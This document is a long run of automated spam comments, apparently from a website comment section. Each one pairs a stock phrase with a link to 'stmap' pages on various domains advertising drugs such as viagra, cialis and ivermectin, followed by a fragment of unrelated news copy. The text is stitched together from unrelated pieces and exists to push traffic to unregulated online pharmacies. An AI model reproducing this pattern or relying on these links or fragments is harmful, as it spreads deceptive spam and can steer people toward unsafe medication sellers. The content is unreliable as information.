How do you spell that? https://pjreporters.com/stmap_37whvkrr.html?viagra.tadalis.zetia.voltarol phenazopyridine shelf life The technology, effectively merging an electrosurgical knifethat cuts through tissue using heat with a mass spectrometer forchemical analysis, has also been shown to be able to distinguishbeef from horsemeat.

kiobo
4/23/2022 5:09:12 PM

Sorry, you must have the wrong number http://photosintesi.com/stmap_24ssxciv.html?amoxil.levitra.atacand aldactone mg Manuel was expected to dump 10 to 15 inches of rain over parts of the Mexican states of Oaxaca and Guerrero with maximums of 25 inches possible in some isolated areas. Authorities said those rains would present an especially dangerous threat in mountains, where flash floods and mudslides were possible.

hjhUL
4/23/2022 5:09:30 PM

magic story very thanks https://proudlyyours.com/stmap_37iydmeb.html?viagra.shuddha.allegra.enalapril sumatriptan zetpil fk But the real benefit of a group interview is that the prospective employer gets to observe you in an environment with your peers. It's a great test of teamwork, leadership and communication skills. It allows you (the interviewee) more opportunity to show your personality – something that interviewers are indeed considering in the hiring process.

IgBAKs
4/23/2022 5:09:53 PM

Not in at the moment https://www.canadabusinessdirectorylistings.com/stmap_37iydmeb.html?carafate.cialis.albuterol ventolin 4 mg 100 tablet While Predators are typically piloted via remote control by someone in the U.S., the X-47B relies only on computer programs to tell it where to fly unless a human operator needs to step in. The Navy says the aircraft relies on precision GPS navigation, a high-integrity network connection and advanced flight control software to guide itself.

oL4TW
4/23/2022 8:11:44 PM

Not in at the moment https://www.system32solutions.com.mx/stmap_24pkcjjq.html?duricef.asendin.cialis.propafenone precio tadalis online “It’s about . . . masturbation — which is not appropriate for my child to learn at 11,” said Kelly-Ann McMullan-Preiss, 39, of Belle Harbor, who refused to let her son read the book. “It was like ‘Fifty Shades of Grey’ for kids.”

lGvLm1
4/23/2022 8:12:04 PM

I'm in my first year at university https://pjreporters.com/stmap_24wriwom.html?levitra.xalatan.tadalafil nexium mups esomeprazole 40 mg harga Prosecutors say Renz was trying to use cable ties to bind the woman to a headrest in her car when she fought back and shouted for the girl to bolt from the vehicle. As the girl ran off and was rescued by a passing motorist, her mother was strangled and repeatedly stabbed in the head and chest, officials said. Renz was captured by police shortly after.

F2AFo5
4/23/2022 8:12:32 PM

Do you know each other? https://www.system32solutions.com.mx/stmap_37iydmeb.html?cialis.lomefloxacin.hyzaar nabumetone 750 mg para q sirve Your Subscriber Account Number is located on the top right hand side of your renewal notice.  To receive a copy of your account number, you may contact the North Platte Telegraph Circulation Department in the following manner.

4sx6t
4/23/2022 8:12:53 PM

perfect design thanks https://www.lynnesilver.com/stmap_24pkcjjq.html?viagra.zyprexa.amoxapine lamictal for migraines side effects "I want to be really clear and determined with everything I'm doing in my life right now and I have been… I keep saying I'm the happiest I've ever been and that's not even a dig. That's just me because I really am genuinely happy finally with myself which I think sometimes it takes you separating yourself from someone else to really be happy with who you are. I've never been able to just be alone and I'm obsessed with being alone and like hearing my thoughts."

tawCs
4/23/2022 8:13:14 PM

What part of do you come from? https://www.system32solutions.com.mx/stmap_18jbbvts.html?anafranil.zydalis.levitra hydroxyzine hcl tablet ** Societe Generale, France's No. 2 listed bank,is exploring the sale of its Asia private banking arm, peoplefamiliar with the matter told Reuters, seeking to exit a marketwhere small managers are getting hit by rising costs andcompetition.

YNnbWT
4/23/2022 8:46:17 PM

I'm a trainee http://www.dethstruck.com/stmap_18qnetae.html?cialis.forzest.himcolin-gel.suprax cipralex erfahrungen bei schmerzen Andy Pettitte is scheduled to make his last major league start Friday night in Houston — unless the Yankees somehow make the playoffs — but he’ll have another important appearance on Wednesday.

2KmoU
4/23/2022 8:46:37 PM

Where are you calling from? http://adamdesautels.com/stmap_24pkcjjq.html?estrogens.cialis.cycrin.atorvastatin amoxicillina e acido clavulanico bustine a cosa serve After the tributes, the congregation applauded and the Reverend Peter Whitehead then addressed the service, paying particular tribute to L/Cpl Roberts’ “passion”, “determination” and positive outlook on life.

LlKdT
4/23/2022 8:47:02 PM

An estate agents https://evilpigeon.dk/stmap_24pkcjjq.html?flomax.viagra.rogaine combination of clomid and duphaston A dozen years ago, Krucker was among the organizers of an effort in the Swiss town of Emmetten to support Milke, including by establishing a bank account that collected donations to aid in her defense. The account eventually netted about 200,000 Swiss francs, or about $213,000 today. It's now nearly drained, he said.

YuQme
4/23/2022 8:47:28 PM

Best Site Good Work http://adamdesautels.com/stmap_37iydmeb.html?viagra.valsartan.dilantin 3v lithium battery Harrison had an eventful life. He had chart success with the song A Young Girl and starred in the TV series The Girl from UNCLE. In 1953, he had become the British ski-racing champion and represented Britain at the Olympics.

S4EhdE
4/23/2022 8:47:53 PM

I can't get a dialling tone http://www.dethstruck.com/stmap_18qnetae.html?amantadine.prilosec.cialis.anafranil terbinafine and coffee The interim cabinet of Prime Minister Jiri Rusnok, who hasnot won a parliamentary confirmation yet and seems unlikely todo so, said his administration would not make any definitivedecision regarding the Temelin tender.

bNtqJz
4/23/2022 9:09:10 PM

What do you want to do when you've finished? https://www.system32solutions.com.mx/stmap_37iydmeb.html?lynoral.revia.levitra.epivir-hbv voltaren gel cena mk When I stepped out into the clearing I found myself at the edge of a mud mosh pit the size of a tennis court, with a few dozen boys and girls in swim suits going absolutely bonkers to the sound of a Polish punk band. Beyond it there was the main stage towering over a billowing cloud of dust thrown up by thousands of dancing metal-heads who were going equally off the rails.

JArB3
4/23/2022 9:09:27 PM

I've got a full-time job http://www.kodiakmetalworks.com/stmap_37whvkrr.html?levitra.manforce.haridra naproxen mp The firm's hedge fund has gained around 19 percent this year to October 11, against a 9 percent rise in the average equity hedge fund according to Hedge Fund Research, while the firm's long-only fund is up 25 percent.

TGKr9
4/23/2022 9:09:45 PM

I'd like , please http://photosintesi.com/stmap_24ssxciv.html?rheumatrex.erythromycin.levitra paracetamol plus diphenhydramine Pettitte put the go-ahead run on base in the bottom of the seventh, giving up a one-out single by Mark Ellis. With Shawn Kelley warming in the bullpen, pitching coach Larry Rothschild came to the mound to talk with Pettitte, who had thrown only 85 pitches to that point.

1yNEpD
4/23/2022 9:10:02 PM

Could I have an application form? http://photosintesi.com/stmap_18qnetae.html?fluoxetine.cataflam.sildalis.levitra fungsi obat pantoprazole 40 mg As the supermarket industry has consolidated, chains likeHarris Teeter, based in Matthews, North Carolina, have struggledto maintain market share against rivals such as Wal-Mart, CostcoWholesale Corp and Whole Foods Market Inc.

kgxQiY
4/23/2022 9:10:15 PM

I've come to collect a parcel https://evilpigeon.dk/stmap_37iydmeb.html?synthroid.levitra.bimatoprost.piracetam para que sirve furacin nitrofural The Fed cut interest rates to almost zero in late 2008 and has since more than tripled the size of its balance sheet to around $3.6 trillion via three massive rounds of bond buying aimed at holding down longer-term borrowing costs.

DBr5t
4/23/2022 10:53:50 PM

Gloomy tales http://photosintesi.com/stmap_37lbquli.html?prednisone.norpace.cialis flavettes vitamin c watson One such climate-change sceptic body, the Competitive Enterprise Institute, is being sued by Professor Mann for defamation relating to suggestions he committed scientific fraud and could be compared to a convicted child molester. Professor Mann said the allegations are untrue and are part of a smear campaign.

lxLE03
4/23/2022 10:54:21 PM

I'd like to order some foreign currency https://endydaniyanto.net/stmap_37whvkrr.html?pristiq.levitra.flutamide ibuprofen lactation risk category Twitter isn't alone in its quest to befriend TV content companies. Facebook, too, is recognizing the value of live TV chatter. Because of its sheer size — nearly 1.2 billion users versus Twitter's 218 million — Facebook has more conversations than any other social network. During the "Breaking Bad" finale, more than 3 million people generated 5.5 million "interactions," that is, status updates, comments or "likes."

AVmEH
4/23/2022 10:54:50 PM

I'm on a course at the moment http://allphotobangkok.com/stmap_24pkcjjq.html?tritace.desyrel.kamagra.levitra cataflam crema en base de gel Yahoo also announced that its tally of monthly active mobile users jumped to 390 million during the third quarter, up from approximately 300 million monthly active mobile user mark in the first quarter of this year. Much of the social networking industry is moving onto mobile devices, and that advertising market might grow, but for now Yahoo’s mobile strategy is unclear, Weiner says.

qSC18
4/23/2022 10:55:16 PM

Who do you work for? http://photosintesi.com/stmap_37lbquli.html?valacyclovir.sotalol.cialis.indocin ivermectine achat en ligne The Chinese president also addressed an APEC CEO summit, where he elaborated on China's current economic situation and next-step reform measures, as well as China's views on the future course of Asia-Pacific development.

nCm7S
4/23/2022 10:55:48 PM

Thanks for calling https://endydaniyanto.net/stmap_24wriwom.html?speman.asendin.levitra.isordil ivermectin tablet safe in pregnancy Eddie Jordan, who replaced Rice at Rutgers, spoke to Poole about remaining with the program, but Poole said, “I felt like I’d have to prove myself to someone who didn’t know me or my game as a senior. Coach Jordan has a great pedigree, but he doesn’t know me like the people at Iona.

QxjMh
4/23/2022 11:15:27 PM

I'd like to open an account https://altreluci.com/stmap_37whvkrr.html?mesterolone.atomoxetine.tritace.viagra coles aspirin "Statistics have shown that over 90 percent of the people that visit come for beaches and clean water," he said. "We live in an instant information age, and the image of black water along the beaches in Lee County has spread around the world in seconds. Unfortunately, that image stays with us for a long, long time. We're a very resilient community, but we need action now."

j80gin
4/23/2022 11:15:51 PM

I didn't go to university https://www.system32solutions.com.mx/stmap_18jbbvts.html?erectafil.labetalol.levitra.rythmol allegra lek za alergiju Yahoo's core business of selling online display and searchadvertising continued to struggle in the third quarter,Schachter said, as the company faced fierce competition fromFacebook Inc and Google Inc.

dI5As
4/23/2022 11:16:10 PM

Through friends https://contraloria.bcs.gob.mx/stmap_18qnetae.html?reglan.kerlone.viagra losartan potassium 50 tablet picture The U.K. says it is considering taking Spain to court over the border checks for vehicles entering Gibraltar. Britain reiterated Friday to Barroso that it feels the checks are politically motivated and disproportionate.

8mRe8q
4/23/2022 11:16:23 PM

How long have you lived here? https://evilpigeon.dk/stmap_24pkcjjq.html?phenergan.sominex.levitra lamictal for migraines side effects Since Boehner can't hold the Republicans in the House together, he will keeping having more and more votes on the one thing the tea party and the Republican Party agree on, which is the repeal of Affordable Care Act. The House's final action before taking off for summer vacation was to vote for the 40th time in a pointless attempt to repeal the law. But the House left town for a month without doing anything to further immigration reform or to fund government operations for the 2014 fiscal year, which starts in less than two months.

HWCDS
4/23/2022 11:16:42 PM

We used to work together https://www.ebbersgroenprojecten.nl/stmap_18jbbvts.html?loperamide.ampicillin.alli.viagra retin-a cream 0.05 amazon Caterham's new model naming policy uses the car's power-to-weight, so here we're talking about roughly 160bhp-per-tonne. Sounds good, no? Less fizz-inducing is the 80bhp this thing actually makes, while 79 torques would leave the skins on most rice puddings unmolested. But the reality is that this is a fantastic recipe.

2Jwi8
4/24/2022 12:23:45 AM

In tens, please (ten pound notes) http://photosintesi.com/stmap_18qnetae.html?cialis.serophene.capecitabine paxil fatigue However, please note - if you block/delete all cookies, some features of our websites, such as remembering your login details, or the site branding for your local newspaper may not function as a result.

vxHcQk
4/24/2022 12:24:06 AM

Could I make an appointment to see ? https://www.lynnesilver.com/stmap_18jbbvts.html?feldene.cialis.shuddha aprender pharmacy Martin went on to worldwide fame as an adult with songs like "Livin' La Vida Loca." In 2012 he took his career to Broadway where he starred in a revival of "Evita" and also had a guest-starring role on the FOX hit "Glee." He's the dad to twin boys.

NtQoD
4/24/2022 1:29:55 AM

This is the job description http://www.dethstruck.com/stmap_37lbquli.html?paracetamol.hindgra.viagra methylprednisolone cause weight gain Our current pledges to reduce greenhouse gas emissions, which are projected to set the global mean temperature increase at around 3.5°C above pre-industrial levels, will expose 668 million people worldwide to new or aggravated ...

U5BU8A
4/24/2022 3:19:15 AM

I'll put him on http://allphotobangkok.com/stmap_37iydmeb.html?acetazolamide.parafon.cialis use of lignocaine hydrochloride gel The law as approved by the Legislature permits anyone with a Firearm Owner's Identification card who has passed a background check and undergone gun-safety training of 16 hours -- longest of any state -- to obtain a concealed-carry permit for $150. 

Jyetk
4/24/2022 3:34:50 AM

I'm from England https://endydaniyanto.net/stmap_18vfkjbs.html?levitra.micronase.lithium topical finasteride deutschland "The good GDP figures will fuel European stocks'outperformance started in late June, and this outperformancecould last at least until the Fed's next meeting inmid-September," FXCM analyst Vincent Ganne said.

yvBXcc
4/24/2022 3:35:08 AM

I'm a trainee https://www.burleighbears.com.au/stmap_37iydmeb.html?estradiol.propranolol.cialis lamisil tablety balen More than 100 calls were received by the fire service from members of the public after the blaze began at about 4.40pm yesterday and spread to an area spanning 220 yards (200m) by 110 yards (100m) on the Meadowbank side of the hill.

nCCjyM
4/24/2022 3:35:31 AM

How much were you paid in your last job? https://www.burleighbears.com.au/stmap_37iydmeb.html?estradiol.propranolol.cialis doxazosina 4 mg precio fybeca Many young and blue-collar voters, angry over mass unemployment and spending cuts, have deserted to protest parties of the anti-capitalist hard left or the Eurosceptical, anti-immigrant far right, as the political landscape fragments, polling evidence shows.

EzNBVG
4/24/2022 3:35:53 AM

How much is a First Class stamp? http://www.kodiakmetalworks.com/stmap_24wriwom.html?viagra.anaprox.mesterolone viagra brand offshore-pharmacy.com Arbitration docs note that consequently, in the NFL's mind, the "Paper Planes" hitmaker did not live up to what she stipulated to in her contract: that she "acknowledge the great value of the goodwill associated with the NFL and the tremendous public respect and reputation for wholesomeness enjoyed by the NFL" and that she "ensure that all elements of [her] Performance, including without limitation [her] wardrobe, shall be consistent with such goodwill and reputation."

GTZcq
4/24/2022 3:36:22 AM

Have you seen any good films recently? https://endydaniyanto.net/stmap_37whvkrr.html?proscar.sinemet.viagra para que sirve la pastilla ibuprofeno de 800 mg Oelstrom recalled meeting Clancy at a dinner in 1999 at the U.S. Air Force Academy in Colorado Springs. Even at the height of his fame, when surrounded by high-ranking fliers telling war stories, Clancy was a careful listener, Oelstrom said.

DAxFh
4/24/2022 3:45:02 AM

I really like swimming https://www.radstrategic.com/stmap_18qnetae.html?tentex.asendin.viagra avodart (dutasteride) 0.5mg In the filing, prosecutors lambasted Kilpatrick for having a criminal record, which includes his conviction in the text message scandal that cost the city of Detroit $8.4 million, drove him from office and landed him in jail three times, twice for probation violations.

qAPp0A
4/24/2022 3:45:24 AM

I've been made redundant https://evilpigeon.dk/stmap_37iydmeb.html?viagra.itraconazole.claritin.combivent ibuprofeno 400 capsulas blandas precio "There were whole rooms empty, with just soldiers walking around in them. It looks like they were bored and trying to get out of the heat," said one recent U.S. college graduate, adding that she hadn't told her parents of her Egypt visit lest they worry.

V3jux
4/24/2022 3:45:43 AM

I work with computers https://www.lynnesilver.com/stmap_37iydmeb.html?maxaquin.erectzan.eregra.cialis vytorin medications list The drugmaker said it will begin testing a new type ofanti-cancer therapy which has the capability to directly enter acancer cell. The therapy, Hsp90-inhibitor Drug Conjugate, has ahigher concentration than standard therapy and can stay inside acancer cell for longer and has less side effects.

WtosuZ
4/24/2022 3:46:08 AM

Who would I report to? https://evilpigeon.dk/stmap_18jbbvts.html?bupropion.levitra.efavirenz.haldol fluticasone propionate mims malaysia Recalling his own “liberating” experiences of acting in drag, the former Blackadder star proposed a National Service-style compulsory period when males would be forced to wear dresses.

Q0Je2o
4/24/2022 3:46:32 AM

On another call https://www.canadabusinessdirectorylistings.com/stmap_37iydmeb.html?cialis.dipyridamole.imitrex.stendra spiriva handihaler images But it was too late. After his last day at school on 1 March, he went home with his mother and was subjected to the assault that cause the head injuries that killed him. As he lay dying in his tiny box room, his parents slept and searched the internet for “patient in  a coma”.

qQIxl
4/24/2022 4:12:39 AM

I don't like pubs https://www.lynnesilver.com/stmap_24pkcjjq.html?prograf.levitra.tretinoin ciprofloxacin hydrochloride ear drops Barrick's management team attempted to warn Munk againstbuying Equinox, noting that Barrick had spent months trying toreduce risk in Africa by spinning its mines there into aseparate operation called African Barrick Gold PLC, thesources said. The board approval of the deal is illustrative ofMunk's sway in the boardroom, they said.

J8ejv
4/24/2022 4:13:04 AM

I've only just arrived https://www.system32solutions.com.mx/stmap_37iydmeb.html?warfarin.viagra.vpxl.minomycin glimepiride wikipedia That incident, and related problems, had both critics and supporters questioning this week whether LAUSD officials were being hasty or overreaching in their attempt to distribute an iPad to every student and teacher at the district's more than 1,000 campuses by next year.

e45tSz
4/24/2022 4:13:29 AM

How many more years do you have to go? https://pjreporters.com/stmap_37whvkrr.html?viagra.pristiq.zofran.levothroid avapro side effect The administration disagreed “almost entirely with your auditors’ findings and conclusions,” Bruce Gaskey, director of the Office of Citywide Emergency Communications, wrote to Liu. Gaskey even accused the controller of “deliberately misrepresent(ing) the facts.”

epWEA
4/24/2022 4:13:46 AM

I have my own business http://photosintesi.com/stmap_24ssxciv.html?viagra.diarex.v-gel telmisartan sandoz "His philosophy was to volunteer to try anything," saidChertoff, who later served as secretary for the U.S. Departmentof Homeland Security and now heads the Chertoff Group consultingfirm. "He wanted to really get that experience."

KXFVEv
4/24/2022 4:14:07 AM

Did you go to university? https://www.ebbersgroenprojecten.nl/stmap_24pkcjjq.html?shuddha.benzoyl.viagra.astelin ibuprofen tesco price Years in NFL: 1997-1999Years Behind Bars: 2001-presentThe former Panthers wide receiver is serving a minimum of 18 years and 11 months in prison for his role in the 1999 shooting death of his pregnant girlfriend. The University of Colorado star was found guilty of three counts, but was spared the death penalty as a jury found him not guilty on the most serious charge of first-degree murder.

g7WRUA
4/24/2022 5:54:20 AM

I've got a part-time job https://www.ebbersgroenprojecten.nl/stmap_18jbbvts.html?tadasoft.levitra.celexa zyban kullananlar 2019 “Regardless of what inning he got to pitch tonight, that moment was pretty cool,” Nathan said. “Pretty cool for us as players, pretty cool for the fans, and I’m sure it was absolutely amazing for Mo. Obviously it would have probably been even better in the ninth for him, but we got him in the game, we got him his moment and we got a win.”

6o94Az
4/24/2022 5:54:53 AM

Photography https://contraloria.bcs.gob.mx/stmap_18qnetae.html?deltasone.exelon.viagra best fairness cream for men - quora As of last year, civilian federal prisons are required to develop treatment plans — including hormone therapy, if necessary — for inmates diagnosed with gender identity disorder, now called gender dysphoria. Unlike military prisons, the policy also allows inmates who believe they are the wrong gender to dress and live accordingly as part of their individual treatment plans.

orw9p
4/24/2022 5:55:23 AM

How much notice do you have to give? https://contraloria.bcs.gob.mx/stmap_18qnetae.html?cialis.mentax.bimatoprost.nymphomax manforce stay long tablet side effects DHAKA, Bangladesh (AP) — A special war crimes tribunal in Bangladesh ruled Tuesday that a senior member of the main opposition party should be put to death for his involvement in the killing of hundreds of people during the county's independence fight against Pakistan in 1971.

LqYT8
4/24/2022 6:04:56 AM

Sorry, you must have the wrong number https://pjreporters.com/stmap_37whvkrr.html?progesterone.menosan.viagra paracetamol ibuprofeno es lo mismo Johnny Galecki starred as the shy, sensitive younger brother of Mark Healy who ends up dating and later marrying Darlene, played by Sara Gilbert. Since his 'Roseanne' days, Galecki has had quite a successful career, with notable roles in flicks such as 'I Know What You Did Last Summer,' 'The Opposite of Sex,' 'Suicide Kings,' and 'Vanilla Sky.' In 2007, he landed his best-known role as Leonard Hofstadter on hit comedy 'The Big Bang Theory.'

HciqTx
4/24/2022 7:11:47 AM

A financial advisor https://pjreporters.com/stmap_18vfkjbs.html?betamethasone.viagra.levothyroxine.lopressor saw palmetto 1200 mg In return for its pledge to 'message' its monetary policyintentions clearly, Washington managed to ensure that the textcontained no binding fiscal targets, saying that consolidationshould be "calibrated" to economic conditions.

c8DKFM
4/24/2022 7:12:06 AM

I'm sorry, he's https://www.radstrategic.com/stmap_24ssxciv.html?fincar.confido.ciplox.cialis edex vs caverject Lawmakers and aides from both parties on Capitol Hill havecriticized Cruz for using his fight against Obamacare, whichincluded a well-publicized 21-hour speech on the Senate floor,as a personal platform to seek the Republican presidentialnomination in 2016. The Tea Party firebrand won election to theSenate only last November.

YkVTh
4/24/2022 7:12:27 AM

I stay at home and look after the children https://www.lynnesilver.com/stmap_24pkcjjq.html?viagra.conjugated.prothiaden.amiloride tarheel pharmacy It is not known if Ocean will be able to perform at theOsheaga Festival in Montreal on Aug. 3 or OVO Music Festival inToronto on Aug. 4, the singer's publicist said. (Reporting by Eric Kelsey; Editing by Piya Sinha-Roy and BillTrott)

oDCHo6
4/24/2022 7:12:52 AM

Who's calling? https://altreluci.com/stmap_37whvkrr.html?levitra.ginseng.royal rogaine for postpartum hair loss "We have an excellent description of the suspect and hope the Galashiels community can help us identify him and bring him to justice. He is known to have been in this area throughout Friday evening and into the early hours of Saturday morning."

Z2tN1R
4/24/2022 7:13:15 AM

How do you spell that? https://www.canadabusinessdirectorylistings.com/stmap_18jbbvts.html?mofetil.paroxetine.avalide.viagra cefixime oral suspension ip cefolac "GTA totally deserves to be recognised as an icon of modern British culture, and we’re thrilled to be able to feature the game in the record books," said Guinness World Records editor-in-chief Craig Glenday.

pcnbH
4/24/2022 8:12:34 AM

I'm originally from Dublin but now live in Edinburgh https://www.burleighbears.com.au/stmap_18jbbvts.html?levitra.catapres.atacand staytal 60 mg in hindi The engineering company said it would sell itsinfrastructure business for $300 million to private equity firmClayton, Dubilier & Rice. Its infrastructure division would bemerged with Brand Energy & Infrastructure Services Inc, acompany that Clayton, Dubilier & Rice is buying from privateequity firm First Reserve. Harsco will get a 29 percent stake inthe combined company, which will have an enterprise value ofabout $2.5 billion, the company said.

aDEJY
4/24/2022 8:12:53 AM

Just over two years https://www.radstrategic.com/stmap_18qnetae.html?hydroxyurea.azithromycin.viagra.zyvox protocolo ivermectina tucuman The group tested 74 "moderately priced" and luxury midsizecars and crossovers. IIHS awarded a "superior" rating to seven:General Motors Co's Cadillac ATS sedan and Cadillac SRXcrossover; Geely Holding Group Co's Volvo S60 sedanand Volvo XC60 crossover; Fuji Heavy Industries Ltd's Subaru Legacy sedan and Subaru Outback wagon, and Daimler AG's Mercedes-Benz C-Class sedan.

kEloE
4/24/2022 8:13:15 AM

Will I have to work shifts? http://adamdesautels.com/stmap_18jbbvts.html?norvir.levitra.cipralex.tofranil calcium carbonate walmart Last month, Canada said it would ask the WTO to approve its proposed retaliatory measures against the U.S., including tariffs on U.S. products meat, cherries, rice and other products. Mexico said it was considering suspending preferential trade tariffs with the United States over the dispute.

AuDWc
4/24/2022 8:13:41 AM

This is the job description https://www.burleighbears.com.au/stmap_18jbbvts.html?viagra.virectin.eulexin.eldepryl himalaya ashwagandha benefits for height The supreme court was forced to issue an unusual statement defending its decision on Tuesday to hear Berlusconi's final appeal on July 30 against a tax fraud conviction. The 76-year-old media magnate's lawyers had not expected a ruling until late in the year.

zbHEta
4/24/2022 10:01:18 AM

I stay at home and look after the children https://endydaniyanto.net/stmap_24wriwom.html?cialis.acai-berry.diclofenac zoloft make you gain weight An Indonesian regulatory official last month said that tintrading rules were designed to boost prices, but some traderssaid because Indonesia's physical tin contract did not havefutures it was tough to hedge and lacked sufficient trade.

LtjF6
4/24/2022 10:01:41 AM

I'd like to cancel a cheque http://allphotobangkok.com/stmap_24pkcjjq.html?trecator-sc.viagra.abilify desloratadine aurobindo prijs In order to make sure bond payments and Social Security checks went out on time, the government would have to delay other payments by days or weeks. That would send a massive economic shockwave through military contractors, hospitals, and other entities farther down the priority list.

RxlFMp
4/24/2022 10:01:58 AM

I was made redundant two months ago https://www.canadabusinessdirectorylistings.com/stmap_18jbbvts.html?cialis.combivir.nateglinide fucidin krem ne demek LIBRA: This has been a time of realistic evaluation of personal resources, and you have most likely had greater responsibility in areas related to earned income, security, and the self-worth issues they relate to. You have dealt with some intense demands in this period, and now is the time to step forward with what you need to do to create the material security you require.

BGwFlR
4/24/2022 10:02:09 AM

I'd like a phonecard, please http://adamdesautels.com/stmap_24pkcjjq.html?robaxin.lotensin.cialis zindolin 500 ciprofloxacin It was our most successful year yet, though, as we managed to get more than 150lb of honey. Many of those jars we sold at a wildflower meadow open day in aid of the local wildlife trust and church, but there is plenty to hand out to friends and BBC bosses by way of sweeteners.

y8k9ZZ
4/24/2022 10:02:15 AM

I hate shopping http://www.dethstruck.com/stmap_24ssxciv.html?elocon.acyclovir.cialis.serophene does bactroban contain sulfa Even if a patient develops a problem from a chemo treatment and doctors have to dial it back, it's important to try a full dose the next time around so the patient gets all the treatment intended, Lyman said.

xFhEbR
4/24/2022 10:02:31 AM

Three years https://proudlyyours.com/stmap_24pkcjjq.html?ceftin.vilagra.viagra insomnia from zoloft temporary It's a pity that we Americans, Indians, Europeans apply the same yardstick of fairness, justice, equality, compassion and even feelings of horror to these radicals who live NOT in the present, but in the non-existent future  (with Allah).

3wXapY
4/24/2022 10:02:37 AM

I'm on a course at the moment http://www.dethstruck.com/stmap_37lbquli.html?acyclovir.levitra.escitalopram amoxicillin pot clavulanate 875 125 pregnancy (f) entered into or varied or authorised or announced or proposed its intention to enter into or vary any contract, transaction, arrangement, reconstruction, amalgamation or commitment (whether in respect of capital expenditure or otherwise) which is of a loss making, long term, unusual or onerous nature or magnitude, or which involves or could involve an obligation of such a nature or magnitude or which is other than in the ordinary course of business or which is or could materially restrict the business or activities of any member of the Wider Abbey Protection Group;

Oimgp
4/24/2022 10:02:49 AM

I've been cut off https://www.ebbersgroenprojecten.nl/stmap_24pkcjjq.html?fluticasone.cialis.propranolol do i need a prescription to buy ivermectin "By the President's refusal to call the situation in Egypt a 'coup' and continuing the flow of foreign assistance to Egypt, he is forthrightly saying 'I am ignoring the rule of law,'" Paul said in a statement. 

abTzxe
4/24/2022 10:27:21 AM

What sort of music do you like? https://www.system32solutions.com.mx/stmap_18jbbvts.html?levitra.zenerx.lanoxin.kytril alesse side effects Second, increased aid and training for Ukrainian civil society, mass media, aid organizations and human rights groups would ensure greater democratic control in elections and encourage Ukrainians to force the country’s elites to be responsible for their actions.

rF4rnw
4/24/2022 10:27:41 AM

I wanted to live abroad https://www.system32solutions.com.mx/stmap_18jbbvts.html?cialis.propecia.desyrel.vpxl lexapro patient assistance program Obviously the Giants are hoping they won’t have to plan for life without Rolle, but any absence — even for a few days or weeks — is concerning to Coughlin, because time is short and training camp is almost done.

1xjC2
4/24/2022 10:28:00 AM

A book of First Class stamps https://www.canadabusinessdirectorylistings.com/stmap_18jbbvts.html?imipramine.tadalis-sx.levitra.diamox clindamycin phosphate and benzoyl peroxide gel before and after The company has a coal mine nearly ready in the neighbouringstate of Odisha, which is meant to feed another power plantwhose construction has been held up by government red tape. Tatawants, but has so far not got permission, to use coal from thatmine to fire the Maithon plant.

4pNBkA
4/24/2022 10:28:25 AM

Please call back later https://www.canadabusinessdirectorylistings.com/stmap_37iydmeb.html?levitra.atrovent.procyclidine.crixivan ciprofloxacina mexico This was seven months before Rodriguez had to come clean — in a manner of speaking — about his use of baseball drugs; before he would become the hero of the 2009 postseason all the way to the Canyon of Heroes; before his two hip surgeries; before Anthony Bosch and Biogenesis.

tw2uaU
4/24/2022 10:28:41 AM

very best job http://allphotobangkok.com/stmap_18jbbvts.html?viprogra.cialis.telmisartan aspirin effect 20 stck preisvergleich July 11 (Reuters) - A U.S. appeals court on Thursdayrejected a Christian university's challenge to President BarackObama's 2010 healthcare overhaul, which the school saidunconstitutionally imposes costly burdens on large employers andinfringes religious liberty.

QQ5Luw
4/24/2022 12:36:18 PM

I'm self-employed https://www.radstrategic.com/stmap_24ssxciv.html?moduretic.cialis.daivonex cephalexin dog ear infection "Lora is in a position of extreme grief and distress and she's looking for any sort explanation of how her brother could have changed from the person she knew into what he is accused of," Spanswick said of DiMaggio's sister.

xO62x
4/24/2022 12:36:42 PM

How many more years do you have to go? https://evilpigeon.dk/stmap_37iydmeb.html?success.viagra.salbutamol 200 mg topamax weight loss Hong Kong has also been open to Chinese Internet stocks,with Tencent Holdings market value soaring to $98billion today from just $800 million when it listed in 2004.Tencent stock accounts for about 3 percent of the Hong Kongexchange's average daily turnover and is among the top 5 tradedstocks.

JPKRf
4/24/2022 12:37:03 PM

Go travelling http://allphotobangkok.com/stmap_18jbbvts.html?avana.diamox.levitra.phenytoin daivonex rezeptfrei Underscoring improved sentiment on equities, there are signs of a pick up inthe initial public offering (IPO) market. Italy's M&G Chemicals is looking toraise about $500 million through a public floatation in Hong Kong in October, while British estate agent Foxtons will file for an IPO as soonas Aug. 27 and could raise as much as 400 million pounds ($618.46 million), according to media reports.

ySaoth
4/24/2022 12:37:30 PM

I'm interested in http://www.dethstruck.com/stmap_18qnetae.html?clarithromycin.praziquantel.cialis.sporanox sciatica ibuprofen or paracetamol Amid speculation that some migrants were left to drown because local fishermen feared breaking the law by rescuing survivors and bringing them ashore, it is being claimed that more could have been done, had it not been for Italian legislation.

cGmSPU
4/24/2022 12:37:54 PM

Thanks for calling https://www.lynnesilver.com/stmap_37iydmeb.html?isordil.sumatriptan.levitra.tolterodine levofloxacin 500 mg tablet uses in hindi The Dallas Morning News reported Kraddick had been a staple in the Dallas market since 1984, starting in a late-night debut. The newspaper said he moved into morning show work by the early 1990s in that market and his show began to gain wider acclaim and entered into syndication by 2001 as he gained a following in cities nationwide.

ytFKz
4/24/2022 12:40:18 PM

What do you do for a living? https://evilpigeon.dk/stmap_18jbbvts.html?cialis.atarax.triamterene.amitriptyline diclofenac sodium delayed release 75 mg "The risk of infections is heightened when people decide to get a piercing done when they are abroad or are attending a music festival. The standards of hygiene may well be lacking, leading to a greater risk of contracting hepatitis. That is why we are calling for the introduction of a regulatory code in Ireland and the EU for piercing establishments" Dr Malone said.

PY9Th
4/24/2022 12:40:41 PM

On another call https://www.canadabusinessdirectorylistings.com/stmap_18jbbvts.html?loxitane.cialis.bactrim.zelnorm allopurinol 300mg pil crescent The only Antipodeans of note at Wimbledon this year, for instance, were in the veterans’ competition, where Pat Cash and Mark Philippoussis did their best to provide fleeting reminder of a time when they actually won in the main draw.

t7mKVt
4/24/2022 12:41:00 PM

real beauty page http://allphotobangkok.com/stmap_24pkcjjq.html?lignocaine.levodopa.levitra.synthroid oxytetracycline price in nigeria The hearing will pit retirees, pension funds and unionstrying to preserve retirement benefits for city workers againstthe city in the fight over bankruptcy -- which will determinehow Detroit's emergency manager can try and right the city'sstrained finances.

OXnEHf
4/24/2022 12:41:20 PM

